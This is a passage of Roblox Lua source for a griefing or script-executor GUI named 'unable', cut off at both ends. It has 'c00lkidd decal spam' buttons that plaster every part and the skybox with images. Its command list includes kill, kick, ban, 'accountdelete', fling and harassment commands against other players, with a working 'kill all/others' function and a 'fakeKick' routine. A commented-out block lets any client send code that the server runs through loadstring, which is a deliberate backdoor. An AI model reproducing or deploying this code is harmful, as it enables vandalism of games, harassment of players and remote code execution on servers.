				Four.Texture = "rbxassetid://117458353677051"
				Five.Texture = "rbxassetid://117458353677051"
				Six.Texture = "rbxassetid://117458353677051"
				One.Face = "Front"
				Two.Face = "Back"
				Three.Face = "Right"
				Four.Face = "Left"
				Five.Face = "Top"
				Six.Face = "Bottom"
			end
			test2(v)
		end
	end
	local function test3(root)
		for _, v in pairs(root:GetChildren()) do
			test3(v)
		end
	end
	test2(game.Workspace)
	test3(game.Workspace)

	local imageId = "rbxassetid://117458353677051"

	local function createBillboardGui(part)
		if part:FindFirstChildOfClass"BillboardGui"then return end

		local billboardGui = Instance.new"BillboardGui"			
		billboardGui.Size = UDim2.new(3, 0, 3, 0)
		billboardGui.AlwaysOnTop = true
		billboardGui.Parent = part
		billboardGui.Adornee = part

		local imageLabel = Instance.new"ImageLabel"			
		imageLabel.Size = UDim2.new(1, 0, 1, 0)
		imageLabel.Image = imageId
		imageLabel.BackgroundTransparency = 1
		imageLabel.Parent = billboardGui
	end

	local function addBillboardGuis()
		for _, descendant in pairs(workspace:GetDescendants()) do
			if descendant:IsA"BasePart"then
				createBillboardGui(descendant)
			end
		end

		workspace.DescendantAdded:Connect(function(newDescendant)
			if newDescendant:IsA"BasePart"then
				createBillboardGui(newDescendant)
			end
		end)
	end

	addBillboardGuis()

	local lighting = game:GetService"Lighting"

	local sky = lighting:FindFirstChildOfClass"Sky"or Instance.new"Sky"

	sky.SkyboxBk = "rbxassetid://117458353677051"
	sky.SkyboxDn = "rbxassetid://117458353677051"
	sky.SkyboxFt = "rbxassetid://117458353677051"
	sky.SkyboxLf = "rbxassetid://117458353677051"
	sky.SkyboxRt = "rbxassetid://117458353677051"
	sky.SkyboxUp = "rbxassetid://117458353677051"

	sky.Parent = lighting
end)

newscriptbutton3("c00lkidd decal\nspam", function()
	local function test2(root)
		for _, v in pairs(root:GetChildren()) do
			if v:IsA"Decal"and v.Texture ~= "rbxassetid://8408806737" then
				v.Parent = nil
			elseif v:IsA"BasePart"then
				v.Material = "Plastic"
				local One = Instance.new("Decal", v)
				local Two = Instance.new("Decal", v)
				local Three = Instance.new("Decal", v)
				local Four = Instance.new("Decal", v)
				local Five = Instance.new("Decal", v)
				local Six = Instance.new("Decal", v)
				One.Texture = "rbxassetid://8408806737"
				Two.Texture = "rbxassetid://8408806737"
				Three.Texture = "rbxassetid://8408806737"
				Four.Texture = "rbxassetid://8408806737"
				Five.Texture = "rbxassetid://8408806737"
				Six.Texture = "rbxassetid://8408806737"
				One.Face = "Front"
				Two.Face = "Back"
				Three.Face = "Right"
				Four.Face = "Left"
				Five.Face = "Top"
				Six.Face = "Bottom"
			end
			test2(v)
		end
	end
	local function test3(root)
		for _, v in pairs(root:GetChildren()) do
			test3(v)
		end
	end
	test2(game.Workspace)
	test3(game.Workspace)

	local imageId = "rbxassetid://8408806737"

	local function createBillboardGui(part)
		if part:FindFirstChildOfClass"BillboardGui"then return end

		local billboardGui = Instance.new"BillboardGui"			
		billboardGui.Size = UDim2.new(3, 0, 3, 0)
		billboardGui.AlwaysOnTop = true
		billboardGui.Parent = part
		billboardGui.Adornee = part

		local imageLabel = Instance.new"ImageLabel"			
		imageLabel.Size = UDim2.new(1, 0, 1, 0)
		imageLabel.Image = imageId
		imageLabel.BackgroundTransparency = 1
		imageLabel.Parent = billboardGui
	end

	local function addBillboardGuis()
		for _, descendant in pairs(workspace:GetDescendants()) do
			if descendant:IsA"BasePart"then
				createBillboardGui(descendant)
			end
		end

		workspace.DescendantAdded:Connect(function(newDescendant)
			if newDescendant:IsA"BasePart"then
				createBillboardGui(newDescendant)
			end
		end)
	end

	addBillboardGuis()

	local lighting = game:GetService"Lighting"

	local sky = lighting:FindFirstChildOfClass"Sky"or Instance.new"Sky"

	sky.SkyboxBk = "rbxassetid://8408806737"
	sky.SkyboxDn = "rbxassetid://8408806737"
	sky.SkyboxFt = "rbxassetid://8408806737"
	sky.SkyboxLf = "rbxassetid://8408806737"
	sky.SkyboxRt = "rbxassetid://8408806737"
	sky.SkyboxUp = "rbxassetid://8408806737"

	sky.Parent = lighting
end)

newscriptbutton3("[empty]", function()
end)

newscriptbutton3("[empty]", function()
end)

newscriptbutton3("[empty]", function()
end)

newscriptbutton3("[empty]", function()
end)

newscriptbutton3("[empty]", function()
end)

newscriptbutton3("[empty]", function()
end)

-------------------------------------------------------------------------------------------------------------------------------

unable["commands tab"] = Instance.new("TextButton")

unable["commands tab"].Size = UDim2.new(0, 100, 0, 26)
unable["commands tab"].Position = UDim2.new(0, 100, 0, 1)

unable["commands tab"].BackgroundColor3 = unable["default background color"]

unable["commands tab"].BorderColor3 = unable["default border color"]
unable["commands tab"].BorderSizePixel = 1

unable["commands tab"].TextColor3 = unable["default border color"]
unable["commands tab"].Font = Enum.Font.RobotoMono
unable["commands tab"].TextSize = 15
unable["commands tab"].TextScaled = false
unable["commands tab"].Text = "commands"
unable["commands tab"].TextXAlignment = Enum.TextXAlignment.Center
unable["commands tab"].TextYAlignment = Enum.TextYAlignment.Center

unable["commands tab text padding"] = Instance.new("UIPadding")
unable["commands tab text padding"].PaddingLeft = UDim.new(0, 0)
unable["commands tab text padding"].Parent = unable["commands tab"]

unable["commands tab"].Parent = unable["main frame"]
unable["commands tab"].ZIndex = 19

unable["commands tab"].MouseButton1Click:Connect(function()
	playclicksound()
	unable["executor scrolling frame"].Visible = false
	unable["execute button"].Visible = false

	unable["next page"].Visible = false
	unable["previous page"].Visible = false
	unable["button holder"].Visible = false
	unable["button holder 2"].Visible = false
	unable["button holder 3"].Visible = false
	
	unable["list of commands"].Visible = true
	unable["command bar"].Visible = true
	unable["execute command button"].Visible = true
	
	unable["asset id type indicator"].Visible = false
	unable["next page 2 button"].Visible = false
	unable["previous page 2 button"].Visible = false
	unable["switch asset id type button"].Visible = false
	unable["switch asset id type button 2"].Visible = false
end)

-------------------------------------------------------------------------------------------------------------------------------

unable["list of commands"] = Instance.new("ScrollingFrame")
unable["list of commands"].Size = UDim2.new(0, 393, 0, 164)
unable["list of commands"].Position = UDim2.new(0, 4, 0, 32)
unable["list of commands"].BackgroundColor3 = unable["default background color"]
unable["list of commands"].BorderColor3 = unable["default border color"]
unable["list of commands"].BorderSizePixel = 1
unable["list of commands"].ScrollBarThickness = 8
unable["list of commands"].ScrollBarImageColor3 = unable["default 1/2 color"]
unable["list of commands"].CanvasSize = UDim2.new(0, 0, 0, 0) -- Dynamically adjusted later
unable["list of commands"].Parent = unable["main frame"]
unable["list of commands"].ZIndex = 19
unable["list of commands"].Visible = false
unable["list of commands"].ScrollingDirection = Enum.ScrollingDirection.Y

-- Add padding for aesthetics
local listPadding = Instance.new("UIPadding")
listPadding.PaddingLeft = UDim.new(0, 4)
listPadding.PaddingTop = UDim.new(0, 4)
listPadding.Parent = unable["list of commands"]

-- Add a UIListLayout to manage positioning of TextLabels
local layout = Instance.new("UIListLayout")
layout.SortOrder = Enum.SortOrder.LayoutOrder
layout.Padding = UDim.new(0, 0) -- Add spacing between items
layout.Parent = unable["list of commands"]

-- Ensure CanvasSize updates dynamically
layout:GetPropertyChangedSignal("AbsoluteContentSize"):Connect(function()
	unable["list of commands"].CanvasSize = UDim2.new(0, 0, 0, layout.AbsoluteContentSize.Y + 10)
end)

-- Reusable function to populate a scrolling frame with text
function populateList(scrollFrame, entries)
	for _, text in ipairs(entries) do
		local line = Instance.new("TextLabel")
		line.Size = UDim2.new(1, -10, 0, 16) -- Full width, fixed height
		line.TextColor3 = unable["default border color"]
		line.BackgroundTransparency = 1
		line.Font = Enum.Font.RobotoMono
		line.TextSize = 15
		line.TextScaled = false
		line.Text = text
		line.TextWrapped = false
		line.TextXAlignment = Enum.TextXAlignment.Left
		line.ZIndex = 20
		line.Parent = scrollFrame
	end
end

-- Example usage: Populating the list of commands
local commandList = {
	"kill [target]", -- added
	"fling [target]",
	"superfling [target]",
	"freeze [target]",
	"thaw [target]",
	"kick [target]", -- added
	"ban [target]", -- added
	"accountdelete [target]", -- added
	"explode [target]",
	"bang [target]",
	"unbang",
	"carpet [target]",
	"uncarpet",
	"facebang [target]",
	"unfacebang",
	"jumpscare [target] [image id]",
	"popup [target] [image id]",
	"unpopup [target]",
	"playaudio [target] [sound id]",
	"headbillboard [target] [image id]",
	"unheadbillboard [target]",
	"torsobillboard [target] [image id]",
	"untorsobillboard [target]",
	"punish [target]",
	"unpunish [target]",
	"spin [target]",
	"unspin [target]",
	"orbit [target] [speed] [offset]",
	"unorbit",
	"follow [target]",
	"unfollow",
	"creeper [target]",
	"uncreeper [target]",
	"headless [target]",
	"unheadless [target]",
	"hairless [target]",
	"unhairless [target]",
	"accessoryless [target]",
	"unaccessoryless [target]",
	"chromaify [target] [speed]",
	"unchromaify [target]",
	"coolrainbow [target]",
	"uncoolrainbow [target]",
	"forceplace [target] [game id]",
	"",
	"decalspam [image id]",
	"billboardspam [image id]",
	"replaceskybox [image id]",
	"billboardrain [image id]",
	"unbillboardrain",
	"billboardspray [image id]",
	"unbillboardspray",
	"disco", -- added
	"undisco", -- added
	"",
	"objectrain [mesh id] [texture id]",
	"replaceparts [mesh id] [texture id]",
	"replaceplayerparts [mesh id] [texture id]",
	"restoremap",
	"hint [text]", -- added
	"closehints", -- added
	"spawn [mesh id] [texture id]",
	"message [text]", -- added
	"closemessages", -- added
	"",
	"gear [target] [gear id]",
	"customgear [mesh id] [texture id]",
	"btools [target]",
	"sword [target]",
	"portalgun [target]",
	"gun [target]",
	"minigun [target]",
	"hairdryer [target]",
	"",
	"cooldance [target]",
	"uncooldance [target]",
	"dance1 [target]",
	"undance1 [target]",
	"dance2 [target]",
	"undance2 [target]",
	"dance3 [target]",
	"undance3 [target]",
	"wave [target]",
	"cheer [target]",
	"laugh [target]",
	"customdance [target]",
	"playanim [target] [animation id]",
	"spasm [target]",
	"unspasm [target]",
	"tpose [target]",
	"untpose [target]",
	"stopanim [target]",
	"reanim [target]",
	"headslide [target]",
	"headthrow [target]",
}

populateList(unable["list of commands"], commandList)

-------------------------------------------------------------------------------------------------------------------------------

-- Command Registry
local commands = {}

-- Function to add a command
function addcommand(name, shortname, func)
	commands[name] = func
	if shortname and shortname ~= "" then
		commands[shortname] = func
	end
end

-- Function to execute a command
local function executeCommand(input)
	local args = {}
	for word in string.gmatch(input, "[^%s]+") do
		table.insert(args, word)
	end

	local commandName = args[1]
	table.remove(args, 1)

	if commands[commandName] then
		commands[commandName](table.unpack(args))
	else
		print("Unknown command: " .. commandName)
	end
end

-- Command bar creation
unable["command bar"] = Instance.new("TextBox")

unable["command bar"].Size = UDim2.new(0, 343, 0, 45)
unable["command bar"].Position = UDim2.new(0, 4, 0, 201)

unable["command bar"].BackgroundColor3 = unable["default background color"]
unable["command bar"].BorderColor3 = unable["default border color"]
unable["command bar"].BorderSizePixel = 1

unable["command bar"].TextColor3 = unable["default border color"]
unable["command bar"].Font = Enum.Font.RobotoMono
unable["command bar"].TextSize = 15
unable["command bar"].TextScaled = false
unable["command bar"].PlaceholderText = "type command here"
unable["command bar"].PlaceholderColor3 = unable["default 1/2 color"]
unable["command bar"].ClearTextOnFocus = true
unable["command bar"].Text = ""
unable["command bar"].TextXAlignment = Enum.TextXAlignment.Center
unable["command bar"].TextYAlignment = Enum.TextYAlignment.Center

unable["command bar text padding"] = Instance.new("UIPadding")
unable["command bar text padding"].PaddingLeft = UDim.new(0, 0)
unable["command bar text padding"].Parent = unable["command bar"]

unable["command bar"].Parent = unable["main frame"]
unable["command bar"].ZIndex = 19
unable["command bar"].Visible = false

-------------------------------------------------------------------------------------------------------------------------------

unable["execute command button"] = Instance.new("TextButton")

unable["execute command button"].Size = UDim2.new(0, 45, 0, 45)
unable["execute command button"].Position = UDim2.new(0, 352, 0, 201)

unable["execute command button"].BackgroundColor3 = unable["default background color"]

unable["execute command button"].BorderColor3 = unable["default border color"]
unable["execute command button"].BorderSizePixel = 1

unable["execute command button"].TextColor3 = unable["default border color"]
unable["execute command button"].Font = Enum.Font.RobotoMono
unable["execute command button"].TextSize = 15
unable["execute command button"].TextScaled = false
unable["execute command button"].Visible = false
unable["execute command button"].Text = ">_"
unable["execute command button"].TextXAlignment = Enum.TextXAlignment.Center
unable["execute command button"].TextYAlignment = Enum.TextYAlignment.Center

unable["execute command button text padding"] = Instance.new("UIPadding")
unable["execute command button text padding"].PaddingLeft = UDim.new(0, 0)
unable["execute command button text padding"].Parent = unable["execute command button"]

unable["execute command button"].Parent = unable["main frame"]
unable["execute command button"].ZIndex = 19

-- Function to handle user input
local function handleUserInput(command, clearCommandBar)
	if command == "" then
		-- notify("Unknown command or invalid arguments.", 5, "error") -- Notify for empty commands
		return
	end

	if clearCommandBar then
		unable["command bar"].Text = "" -- Clear the command bar if requested
	end
	executeCommand(command) -- Execute the command
end

-- Connect the button click to the handle function without clearing the command bar
unable["execute command button"].MouseButton1Click:Connect(function()
	unable["click sound"]:Play()
	local command = unable["command bar"].Text
	handleUserInput(command, false) -- Do not clear the command bar
end)

-- Connect the FocusLost event to the handle function and clear the command bar
unable["command bar"].FocusLost:Connect(function(enterPressed)
	if enterPressed then
		local command = unable["command bar"].Text
		handleUserInput(command, true) -- Clear the command bar
	end
end)

-------------------------------------------------------------------------------------------------------------------------------

unable["asset ids tab"] = Instance.new("TextButton")

unable["asset ids tab"].Size = UDim2.new(0, 100, 0, 26)
unable["asset ids tab"].Position = UDim2.new(0, 200, 0, 1)

unable["asset ids tab"].BackgroundColor3 = unable["default background color"]

unable["asset ids tab"].BorderColor3 = unable["default border color"]
unable["asset ids tab"].BorderSizePixel = 1

unable["asset ids tab"].TextColor3 = unable["default border color"]
unable["asset ids tab"].Font = Enum.Font.RobotoMono
unable["asset ids tab"].TextSize = 15
unable["asset ids tab"].TextScaled = false
unable["asset ids tab"].Text = "asset IDs"
unable["asset ids tab"].TextXAlignment = Enum.TextXAlignment.Center
unable["asset ids tab"].TextYAlignment = Enum.TextYAlignment.Center

unable["asset ids tab text padding"] = Instance.new("UIPadding")
unable["asset ids tab text padding"].PaddingLeft = UDim.new(0, 0)
unable["asset ids tab text padding"].Parent = unable["asset ids tab"]

unable["asset ids tab"].Parent = unable["main frame"]
unable["asset ids tab"].ZIndex = 19

-------------------------------------------------------------------------------------------------------------------------------

unable["asset id type indicator"] = Instance.new("TextLabel")
unable["asset id type indicator"].Size = UDim2.new(0, 345, 0, 20)
unable["asset id type indicator"].Position = UDim2.new(0, 28, 0, 32)
unable["asset id type indicator"].BackgroundColor3 = unable["default background color"]
unable["asset id type indicator"].BorderColor3 = unable["default border color"]
unable["asset id type indicator"].BorderSizePixel = 1
unable["asset id type indicator"].TextColor3 = unable["default border color"]
unable["asset id type indicator"].Font = Enum.Font.RobotoMono
unable["asset id type indicator"].TextSize = 15
unable["asset id type indicator"].TextScaled = false
unable["asset id type indicator"].Text = "MESH IDS [0/0]"
unable["asset id type indicator"].TextXAlignment = Enum.TextXAlignment.Center
unable["asset id type indicator"].TextYAlignment = Enum.TextYAlignment.Center
unable["asset id type indicator text padding"] = Instance.new("UIPadding")
unable["asset id type indicator text padding"].PaddingLeft = UDim.new(0, 0)
unable["asset id type indicator text padding"].Parent = unable["asset id type indicator"]
unable["asset id type indicator"].Parent = unable["main frame"]
unable["asset id type indicator"].ZIndex = 19
unable["asset id type indicator"].Visible = false

-------------------------------------------------------------------------------------------------------------------------------

unable["switch asset id type button"] = Instance.new("TextButton")
unable["switch asset id type button"].Size = UDim2.new(0, 19, 0, 20)
unable["switch asset id type button"].Position = UDim2.new(0, 4, 0, 32)
unable["switch asset id type button"].BackgroundColor3 = unable["default background color"]
unable["switch asset id type button"].BorderColor3 = unable["default border color"]
unable["switch asset id type button"].BorderSizePixel = 1
unable["switch asset id type button"].TextColor3 = unable["default border color"]
unable["switch asset id type button"].Font = Enum.Font.RobotoMono
unable["switch asset id type button"].TextSize = 20
unable["switch asset id type button"].TextScaled = false
unable["switch asset id type button"].Text = "<"
unable["switch asset id type button"].TextXAlignment = Enum.TextXAlignment.Center
unable["switch asset id type button"].TextYAlignment = Enum.TextYAlignment.Center
unable["switch asset id type button"].Parent = unable["main frame"]
unable["switch asset id type button"].ZIndex = 20
unable["switch asset id type button"].Visible = false
unable["switch asset id type button text padding"] = Instance.new("UIPadding")
unable["switch asset id type button text padding"].PaddingTop = UDim.new(0, -4)
unable["switch asset id type button text padding"].Parent = unable["switch asset id type button"]

unable["switch asset id type button 2"] = Instance.new("TextButton")
unable["switch asset id type button 2"].Size = UDim2.new(0, 19, 0, 20)
unable["switch asset id type button 2"].Position = UDim2.new(0, 378, 0, 32)
unable["switch asset id type button 2"].BackgroundColor3 = unable["default background color"]
unable["switch asset id type button 2"].BorderColor3 = unable["default border color"]
unable["switch asset id type button 2"].BorderSizePixel = 1
unable["switch asset id type button 2"].TextColor3 = unable["default border color"]
unable["switch asset id type button 2"].Font = Enum.Font.RobotoMono
unable["switch asset id type button 2"].TextSize = 20
unable["switch asset id type button 2"].TextScaled = false
unable["switch asset id type button 2"].Text = ">"
unable["switch asset id type button 2"].TextXAlignment = Enum.TextXAlignment.Center
unable["switch asset id type button 2"].TextYAlignment = Enum.TextYAlignment.Center
unable["switch asset id type button 2"].Parent = unable["main frame"]
unable["switch asset id type button 2"].ZIndex = 20
unable["switch asset id type button 2"].Visible = false
unable["switch asset id type button 2 text padding"] = Instance.new("UIPadding")
unable["switch asset id type button 2 text padding"].PaddingTop = UDim.new(0, -4)
unable["switch asset id type button 2 text padding"].Parent = unable["switch asset id type button 2"]

-- Define variables to track pages
local assetIdPages = {"mesh IDs [page 0/0]", "image IDs [page 0/0]", "sound IDs [page 0/0]", "gear IDs [page 0/0]"} -- Example pages
local currentAssetIdPageIndex = 1 -- Default to the first page
local savedAssetIdPageIndex = 1 -- To save the last visited page

-- Function to update the asset ID type indicator
local function updateAssetIdTypeIndicator()
	unable["asset id type indicator"].Text = assetIdPages[currentAssetIdPageIndex]
end

-- Save the current page when switching tabs
unable["asset ids tab"].MouseButton1Click:Connect(function()
	playclicksound()
	-- Hide other elements
	unable["executor scrolling frame"].Visible = false
	unable["execute button"].Visible = false
	unable["next page"].Visible = false
	unable["previous page"].Visible = false
	unable["button holder"].Visible = false
	unable["button holder 2"].Visible = false
	unable["button holder 3"].Visible = false
	unable["list of commands"].Visible = false
	unable["command bar"].Visible = false
	unable["execute command button"].Visible = false

	-- Show asset ID-related elements
	unable["asset id type indicator"].Visible = true
	unable["next page 2 button"].Visible = true
	unable["previous page 2 button"].Visible = true
	unable["switch asset id type button"].Visible = true
	unable["switch asset id type button 2"].Visible = true

	-- Restore saved page
	currentAssetIdPageIndex = savedAssetIdPageIndex
	updateAssetIdTypeIndicator()
end)

-- Switch to the previous asset ID type
unable["switch asset id type button"].MouseButton1Click:Connect(function()
	playclicksound()

	currentAssetIdPageIndex = (currentAssetIdPageIndex - 2) % #assetIdPages + 1 -- Wrap around to the last page if necessary
	savedAssetIdPageIndex = currentAssetIdPageIndex -- Save the new page index
	updateAssetIdTypeIndicator()
end)

-- Switch to the next asset ID type
unable["switch asset id type button 2"].MouseButton1Click:Connect(function()
	playclicksound()
	
	currentAssetIdPageIndex = currentAssetIdPageIndex % #assetIdPages + 1 -- Wrap around to the first page if necessary
	savedAssetIdPageIndex = currentAssetIdPageIndex -- Save the new page index
	updateAssetIdTypeIndicator()
end)

-- Reset to the first page when execute command button is clicked
unable["execute command button"].MouseButton1Click:Connect(function()
	playclicksound()

	currentAssetIdPageIndex = 1
	savedAssetIdPageIndex = currentAssetIdPageIndex -- Save the reset page index
	updateAssetIdTypeIndicator()
end)

-------------------------------------------------------------------------------------------------------------------------------

unable["next page 2 button"] = Instance.new("TextButton")
unable["next page 2 button"].Size = UDim2.new(0, 19, 0, 189)
unable["next page 2 button"].Position = UDim2.new(0, 4, 0, 57)
unable["next page 2 button"].BackgroundColor3 = unable["default background color"]
unable["next page 2 button"].BorderColor3 = unable["default border color"]
unable["next page 2 button"].BorderSizePixel = 1
unable["next page 2 button"].TextColor3 = unable["default border color"]
unable["next page 2 button"].Font = Enum.Font.RobotoMono
unable["next page 2 button"].TextSize = 20
unable["next page 2 button"].TextScaled = false
unable["next page 2 button"].Text = "<"
unable["next page 2 button"].TextXAlignment = Enum.TextXAlignment.Center
unable["next page 2 button"].TextYAlignment = Enum.TextYAlignment.Center
unable["next page 2 button"].Parent = unable["main frame"]
unable["next page 2 button"].ZIndex = 20
unable["next page 2 button"].Visible = false
unable["next page 2 button text padding"] = Instance.new("UIPadding")
unable["next page 2 button text padding"].PaddingTop = UDim.new(0, -4)
unable["next page 2 button text padding"].Parent = unable["next page 2 button"]

unable["previous page 2 button"] = Instance.new("TextButton")
unable["previous page 2 button"].Size = UDim2.new(0, 20, 0, 189)
unable["previous page 2 button"].Position = UDim2.new(0, 377, 0, 57)
unable["previous page 2 button"].BackgroundColor3 = unable["default background color"]
unable["previous page 2 button"].BorderColor3 = unable["default border color"]
unable["previous page 2 button"].BorderSizePixel = 1
unable["previous page 2 button"].TextColor3 = unable["default border color"]
unable["previous page 2 button"].Font = Enum.Font.RobotoMono
unable["previous page 2 button"].TextSize = 20
unable["previous page 2 button"].TextScaled = false
unable["previous page 2 button"].Text = ">"
unable["previous page 2 button"].TextXAlignment = Enum.TextXAlignment.Center
unable["previous page 2 button"].TextYAlignment = Enum.TextYAlignment.Center
unable["previous page 2 button"].Parent = unable["main frame"]
unable["previous page 2 button"].ZIndex = 20
unable["previous page 2 button"].Visible = false
unable["previous page 2 button text padding"] = Instance.new("UIPadding")
unable["previous page 2 button text padding"].PaddingTop = UDim.new(0, -4)
unable["previous page 2 button text padding"].Parent = unable["previous page 2 button"]

-------------------------------------------------------------------------------------------------------------------------------

unable["executor tab"] = Instance.new("TextButton")

unable["executor tab"].Size = UDim2.new(0, 100, 0, 26)
unable["executor tab"].Position = UDim2.new(0, 301, 0, 1)

unable["executor tab"].BackgroundColor3 = unable["default background color"]

unable["executor tab"].BorderColor3 = unable["default border color"]
unable["executor tab"].BorderSizePixel = 1

unable["executor tab"].TextColor3 = unable["default border color"]
unable["executor tab"].Font = Enum.Font.RobotoMono
unable["executor tab"].TextSize = 15
unable["executor tab"].TextScaled = false
unable["executor tab"].Text = "executor"
unable["executor tab"].TextXAlignment = Enum.TextXAlignment.Center
unable["executor tab"].TextYAlignment = Enum.TextYAlignment.Center

unable["executor tab text padding"] = Instance.new("UIPadding")
unable["executor tab text padding"].PaddingLeft = UDim.new(0, 0)
unable["executor tab text padding"].Parent = unable["executor tab"]

unable["executor tab"].Parent = unable["main frame"]
unable["executor tab"].ZIndex = 19

unable["executor tab"].MouseButton1Click:Connect(function()
	playclicksound()
	unable["executor scrolling frame"].Visible = true
	unable["execute button"].Visible = true

	unable["next page"].Visible = false
	unable["previous page"].Visible = false
	unable["button holder"].Visible = false
	unable["button holder 2"].Visible = false
	unable["button holder 3"].Visible = false
	
	unable["list of commands"].Visible = false
	unable["command bar"].Visible = false
	unable["execute command button"].Visible = false
	
	unable["asset id type indicator"].Visible = false
	unable["next page 2 button"].Visible = false
	unable["previous page 2 button"].Visible = false
	unable["switch asset id type button"].Visible = false
	unable["switch asset id type button 2"].Visible = false
end)

-------------------------------------------------------------------------------------------------------------------------------

-- Create the ScrollingFrame
unable["executor scrolling frame"] = Instance.new("ScrollingFrame")
unable["executor scrolling frame"].Size = UDim2.new(0, 393, 0, 164)
unable["executor scrolling frame"].Position = UDim2.new(0, 4, 0, 32)
unable["executor scrolling frame"].BackgroundColor3 = unable["default background color"]
unable["executor scrolling frame"].BorderColor3 = unable["default border color"]
unable["executor scrolling frame"].BorderSizePixel = 1
unable["executor scrolling frame"].ScrollBarThickness = 8
unable["executor scrolling frame"].ScrollBarImageColor3 = unable["default 1/2 color"]
unable["executor scrolling frame"].CanvasSize = UDim2.new(0, 0, 0, 0) -- Dynamically adjusted later
unable["executor scrolling frame"].Parent = unable["main frame"]
unable["executor scrolling frame"].ZIndex = 19
unable["executor scrolling frame"].Visible = false
unable["executor scrolling frame"].ScrollingDirection = Enum.ScrollingDirection.Y

-- Create the TextBox inside the ScrollingFrame
unable["executor textbox"] = Instance.new("TextBox")
unable["executor textbox"].Size = UDim2.new(0, 393, 0, 164) -- Initial size
unable["executor textbox"].Position = UDim2.new(0, 0, 0, 0)
unable["executor textbox"].BackgroundColor3 = unable["default background color"]
unable["executor textbox"].BorderColor3 = unable["default border color"]
unable["executor textbox"].BorderSizePixel = 0
unable["executor textbox"].TextColor3 = unable["default border color"]
unable["executor textbox"].PlaceholderText = "paste script here"
unable["executor textbox"].PlaceholderColor3 = unable["default 1/2 color"]
unable["executor textbox"].Font = Enum.Font.RobotoMono
unable["executor textbox"].TextSize = 15
unable["executor textbox"].TextScaled = false
unable["executor textbox"].Text = ""
unable["executor textbox"].TextXAlignment = Enum.TextXAlignment.Left
unable["executor textbox"].TextYAlignment = Enum.TextYAlignment.Top
unable["executor textbox"].ClearTextOnFocus = false
unable["executor textbox"].MultiLine = true -- Enable multiline text
unable["executor textbox"].Parent = unable["executor scrolling frame"]
unable["executor textbox"].ZIndex = 20

unable["executor textbox text padding"] = Instance.new("UIPadding")
unable["executor textbox text padding"].PaddingLeft = UDim.new(0, 4)
unable["executor textbox text padding"].PaddingTop = UDim.new(0, 4)
unable["executor textbox text padding"].PaddingBottom = UDim.new(0, 4)
unable["executor textbox text padding"].Parent = unable["executor scrolling frame"]


-- Function to update the CanvasSize and TextBox height
local function updateCanvas()
	local textBounds = unable["executor textbox"].TextBounds
	unable["executor textbox"].Size = UDim2.new(0, 392, 0, textBounds.Y + 164)
	unable["executor scrolling frame"].CanvasSize = UDim2.new(0, 0, 0, textBounds.Y + 11) -- Adjust scrolling frame
end

-- Connect the function to the TextBox's text change event
unable["executor textbox"]:GetPropertyChangedSignal("Text"):Connect(updateCanvas)

-- Initial update
updateCanvas()

unable["execute button"] = Instance.new("TextButton")

unable["execute button"].Size = UDim2.new(0, 393, 0, 45)
unable["execute button"].Position = UDim2.new(0, 4, 0, 201)

unable["execute button"].BackgroundColor3 = unable["default background color"]

unable["execute button"].BorderColor3 = unable["default border color"]
unable["execute button"].BorderSizePixel = 1

unable["execute button"].TextColor3 = unable["default border color"]
unable["execute button"].Font = Enum.Font.RobotoMono
unable["execute button"].TextSize = 15
unable["execute button"].TextScaled = false
unable["execute button"].Text = "execute"
unable["execute button"].TextXAlignment = Enum.TextXAlignment.Center
unable["execute button"].TextYAlignment = Enum.TextYAlignment.Center

unable["execute button text padding"] = Instance.new("UIPadding")
unable["execute button text padding"].PaddingLeft = UDim.new(0, 0)
unable["execute button text padding"].Parent = unable["execute button"]

unable["execute button"].Parent = unable["main frame"]
unable["execute button"].ZIndex = 19
unable["execute button"].Visible = false

--[[ local remoteEvent = Instance.new("RemoteEvent")
remoteEvent.Name = "unableexecute"
remoteEvent.Parent = unable["replicated storage"]

remoteEvent.OnServerEvent:Connect(function(player, code)
	local sandbox = {} -- Create a sandboxed environment
	setmetatable(sandbox, { __index = _G }) -- Allow access to global functions if desired

	local func, errorMessage = loadstring(code) -- Compile the code
	if func then
		setfenv(func, sandbox) -- Set the environment to the sandbox
		local success, result = pcall(func) -- Execute the code safely
		if success then
			print("Code executed successfully:", result)
		else
			warn("Error during execution:", result)
		end
	else
		warn("Compilation error:", errorMessage)
	end
end)

local remoteEvent = unable["replicated storage"]:WaitForChild("ExecuteCode")

local textBox = unable["executor textbox"] -- TextBox for code input

unable["execute button"].MouseButton1Click:Connect(function()
	local code = textBox.Text -- Get the text from the TextBox
	if code and code ~= "" then
		playclicksound()
		remoteEvent:FireServer(code) -- Send the code to the server for execution
	end
end) ]]--

unable["execute button"].MouseButton1Click:Connect(function()
	playclicksound()
end)

-------------------------------------------------------------------------------------------------------------------------------

addcommand("kill", "kill", function(target)
	local players = game:GetService("Players"):GetPlayers()

	local function setHealthToZero(player)
		local character = player.Character
		if character and character:FindFirstChild("Humanoid") then
			character.Humanoid.Health = 0
		end
	end

	if target == "me" then
		local localPlayer = game:GetService("Players").LocalPlayer
		if localPlayer then
			setHealthToZero(localPlayer)
		end
	elseif target == "random" then
		local randomPlayer = players[math.random(1, #players)]
		setHealthToZero(randomPlayer)
	elseif target == "others" then
		local localPlayer = game:GetService("Players").LocalPlayer
		for _, player in ipairs(players) do
			if player ~= localPlayer then
				setHealthToZero(player)
			end
		end
	elseif target == "all" then
		for _, player in ipairs(players) do
			setHealthToZero(player)
		end
	else
		local found = false
		for _, player in ipairs(players) do
			if string.find(string.lower(player.Name), string.lower(target)) then
				setHealthToZero(player)
				found = true
				break
			end
		end
		if not found then
		end
	end
end)

-------------------------------------------------------------------------------------------------------------------------------

local function fakeKick(player)
	local function makeInvisible(character)
		-- Ensure the character has a HumanoidRootPart and teleport it 9000 studs up
		local humanoidRootPart = character:FindFirstChild("HumanoidRootPart")
		if humanoidRootPart then
			-- Teleport the player 9000 studs up
			humanoidRootPart.CFrame = CFrame.new(humanoidRootPart.Position.X, humanoidRootPart.Position.Y + 9000, humanoidRootPart.Position.Z)

			-- Wait for a short moment to ensure the teleportation is processed
			wait(0.1)

			-- Make all parts and decals invisible
			for _, part in ipairs(character:GetDescendants()) do
				if part:IsA("BasePart") or part:IsA("Decal") then
					part.Transparency = 1 -- Make the part invisible
				elseif part:IsA("ParticleEmitter") or part:IsA("Light") or part:IsA("Beam") or part:IsA("Trail") then
					part.Enabled = false -- Disable visual effects
				elseif part:IsA("BillboardGui") or part:IsA("SurfaceGui") then
					part.Enabled = false -- Disable GUIs
				end
			end

			-- Hide accessories
			for _, accessory in ipairs(character:GetChildren()) do
				if accessory:IsA("Accessory") and accessory:FindFirstChild("Handle") then
					accessory.Handle.Transparency = 1 -- Make accessory handle invisible
